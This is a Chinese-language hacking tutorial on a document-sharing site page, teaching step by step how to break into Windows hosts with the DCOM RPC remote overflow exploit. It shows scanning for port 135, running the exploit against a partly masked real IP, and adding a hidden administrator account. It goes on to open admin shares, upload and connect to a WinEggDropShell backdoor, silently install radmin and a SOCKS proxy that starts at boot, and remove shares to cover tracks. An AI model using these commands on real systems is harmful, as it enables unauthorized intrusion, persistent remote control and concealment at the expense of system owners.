


下載本文檔
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
1、利用dcomrpc遠(yuǎn)程溢出漏洞入侵主機(jī)最近,網(wǎng)上非常流行dcomrpc,那今天我們就教你詳細(xì)的利用dcomrpc入侵。和入侵之后必須做什么。 需要的工具: 很好的: radmin.EE 掃描工具: retinarpcdcom.EE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟 telnet工具:telnet.vbe opentelnet.EE resumetelnet.EE 代理:sksockserver.EE 后門程序:WinEggDropShellPro3thVersion 好了,該做的都做的差不多了。 先使用retinarpcdcom.EE掃描一個(gè)網(wǎng)段。查找有rpc漏洞的機(jī)子,
2、這個(gè)漏洞需要135端口開放,(想必 隨便掃一下就會(huì)發(fā)現(xiàn)有許多主機(jī)開放的135端口) 211.217.50.xx 第一個(gè)主機(jī)就被掃出來又此漏洞。 看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下其他的缺陷主機(jī)開了3389端口我們可以上去看一下是xp版本還是win2k是win2k server版本展開命令行: 查看dcomrpc的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpc RPC DCOM Expl01t coded by .:oc192.us:. Security Complied and Modi
3、fied by Expl01t Usage: dcomrpc -d <host> options Options: -d: Hostname to attack Required -t: Type Default: 0 -r: Return address Default: Selected from target -p: Attack port Default: 135 -l: Bindshell port Default: 666 Types: 0 0x0018759f: Win2k-Universal 1 0x0100139d: WinXP-Universal 開始進(jìn)行溢出:
4、 F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0 RPC DCOM remote expl01t - .:oc192.us:. Security Complied and recorrected by Expl01t + Resolving host. + Done. + Expl01ting.Just wait. 等到出現(xiàn),說明溢出成功 c:/winnt/system32> 接著我們建立用戶 c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。 把用戶添加成超級(jí)管理員 c:/winnt/
5、system32>net localgroup administrators blueye$ /add 命令成功完成。 看看共享開了沒有沒有的話把共享開開 c:/winnt/system32>net share 清單是空的。 c:/winnt/system32>net share ipc$ 命令成功完成。 c:/winnt/system32>net share admin$ 命令成功完成。 到這里我們?nèi)肭指嬉欢温?建 立 IPC$ 連 接 ,也可以使用tftp上傳 ,先和對(duì)方建立連接 F:/hack>net use /211.217.50.xx/ipc$ &quo
6、t;1111" /user:blueye$ 上 傳 一 個(gè) 后 門 程 序 到 對(duì) 方 的 主 機(jī) 里 F:/hack>copy d:/inject.EE /211.217.50.xx/admin$/system32 F:/hack>copy d:/tback.dll /211.217.50.xx/admin$/system32 然后運(yùn)行后門程序,我們可以使用at命令。但是有的機(jī)器把a(bǔ)t明令禁止了,建議直接開起telnet 使用opentelnet.EE 關(guān)閉開啟的telnet使用resumetelnet / /ip user password 如果忘記開共享可以使用腳本
7、開啟 telnet來開共享,用法: cscript telnet.vbe ip user password null port (null是驗(yàn)證方式) F:/hack>opentenet /211.217.50.xx blueye$ 1111 1 4567 F:/hack>telnet 211.217.50.xx 4567 (省略) 連接并運(yùn)行后門程序運(yùn)行后門程序命令 根目錄:inject.EE -run (后門使用方法和安裝都在zip文件里面包含了) 后門端口123456 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDr
8、opShell Matrix Version Melody 下面安裝radmin,配置好的radmin客戶端有4個(gè)文件。配置radmin客戶端可參考相關(guān)文章。 radmin.reg raddrv.dll admdll.dll r_server.EE 把這個(gè)4個(gè)文件copy c:/winnt/system32 在目錄下面執(zhí)行命令 c:/winnt/system32>r_server /s radmin.reg -導(dǎo)入注冊(cè)表 c:/winnt/system32>r_server /install /silence -安裝radmin.并且不顯示托盤 c:/winnt/system32&
9、gt;net start r_server - 啟動(dòng)服務(wù) 安裝sock代理 把sksockserver.EE copy c:/winnt/system32 c:/winnt/system32>sksockserver /install -安裝服務(wù) c:/winnt/system32>sksockserver -config port 1234 -端口定在1234 自己可以改 c:/winnt/system32>sksockserver -config starttype 2 -開機(jī)自動(dòng)啟動(dòng) c:/winnt/system32>net start skserver -啟動(dòng)
10、服務(wù) 最后刪除共享 net share ipc$ /del net share admin$ /del 在安裝radmin的時(shí)候你發(fā)現(xiàn)有人已經(jīng)安裝了。 看操作 (我輸入的內(nèi)容) 后門連接 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody #(pslist) Melody #(pskill r_server) Melody #(shell) c:/winnt/system32>(del r_server.EE) c:/winnt/system32>(del admdll.dll) c:/winnt/system32>(del raddrv.dll) copy你自己的上去,然后安裝 省事的辦法直接導(dǎo)入注冊(cè)表,然后重新輸入安裝命令運(yùn)行,就可以了,只是在原來默認(rèn)端口上
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 林業(yè)病蟲害防治原理與技術(shù)考核試卷
- 珠海市高三月質(zhì)量監(jiān)測(cè)(二模)數(shù)學(xué)理試題
- 佳木斯職業(yè)學(xué)院《土木工程材料雙語》2023-2024學(xué)年第二學(xué)期期末試卷
- 山東省臨沭一中2025屆高考前適應(yīng)性練習(xí)英語試題含解析
- 南京視覺藝術(shù)職業(yè)學(xué)院《高等代數(shù)上》2023-2024學(xué)年第二學(xué)期期末試卷
- 江蘇省揚(yáng)州市廣陵區(qū)竹西中學(xué)2025屆初三第一次模擬(5月)生物試題含解析
- 綿陽市梓潼縣2024-2025學(xué)年數(shù)學(xué)三下期末檢測(cè)試題含解析
- 邵陽學(xué)院《交通工程經(jīng)濟(jì)與管理》2023-2024學(xué)年第二學(xué)期期末試卷
- 偏關(guān)縣2025屆三年級(jí)數(shù)學(xué)第二學(xué)期期末考試模擬試題含解析
- 江蘇省蘇州市第五中學(xué)2024-2025學(xué)年高考語文試題目標(biāo)測(cè)試卷(1)含解析
- 知識(shí)產(chǎn)權(quán)法(四川師范大學(xué))智慧樹知到答案2024年四川師范大學(xué)
- 2024-2030年中國(guó)羊絨市場(chǎng)銷售格局與未來發(fā)展動(dòng)向追蹤報(bào)告
- 北京市昌平區(qū)2023-2024學(xué)年高二下學(xué)期期末考試政治試題
- 古代詩人名人韓愈人物介紹課件
- 建筑用砂石料采購 投標(biāo)方案(技術(shù)方案)
- 《1.4莖和葉》說課稿、教案、教學(xué)設(shè)計(jì)和同步練習(xí)
- 人教版初中化學(xué)實(shí)驗(yàn)?zāi)夸?總表)
- 國(guó)家開放大學(xué)《現(xiàn)代教育原理》形考任務(wù)1-5參考答案
- 監(jiān)控工程驗(yàn)收單-范本模板
- 消防演練中的常見問題與應(yīng)對(duì)措施
- 消防設(shè)施安全檢查表
評(píng)論
0/150
提交評(píng)論